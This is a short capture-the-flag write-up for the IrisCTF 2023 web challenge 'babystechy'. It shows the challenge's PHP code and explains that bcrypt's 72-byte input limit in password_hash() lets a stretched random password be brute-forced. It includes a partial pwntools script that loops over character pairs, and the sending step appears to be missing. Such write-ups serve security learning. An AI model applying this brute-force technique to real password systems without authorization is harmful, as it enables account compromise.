IrisCTF 2023-web-babystechy

yoobi·2023년 1월 25일


  • password_hash(), 72 bytes
  • check details of specific funtions
  • print it out

Given info

  • chal.php was given
$password = exec("openssl rand -hex 64");

$stretched_password = "";
for($a = 0; $a < strlen($password); $a++) {
    for($b = 0; $b < 64; $b++)
        $stretched_password .= $password[$a];

echo "Fear my 4096 byte password!\n> ";

$h = password_hash($stretched_password, PASSWORD_DEFAULT);

while (FALSE !== ($line = fgets(STDIN))) {
    if(password_verify(trim($line), $h)) die(file_get_contents("flag"));
    echo "> ";

  • We should make true of password_verify()


  1. find REAL $h value
  2. bypass password_verify()
  • $h made by very strange codes
$password = exec("openssl rand -hex 64");
$stretched_password = "";
for($a = 0; $a < strlen($password); $a++) {
    for($b = 0; $b < 64; $b++)
        $stretched_password .= $password[$a];
$h = password_hash($stretched_password, PASSWORD_DEFAULT);

get result of chal.php file

  • We can see that streched_password have very long data
  • But, password_hash() function only allowed maximum 72 bytes
  • It means we can bruteforce the 72 bytes value. because same 64 bytes and same 8 bytes values

brute forcing

  • make to brute forcing 72 bytes (64 + 8 bytes)
import subprocess
import pwn
import string

pwn.context.log_level = "debug"

r = pwn.process(["php", "chal.php"])

wordlist = string.digits + string.ascii_letters

for vector1 in wordlist:
    for vector2 in wordlist:
        payload = vector1 * 64 + vector2 * 8

        r.recvuntil("> ")

  • We can get FLAG
this is yoobi

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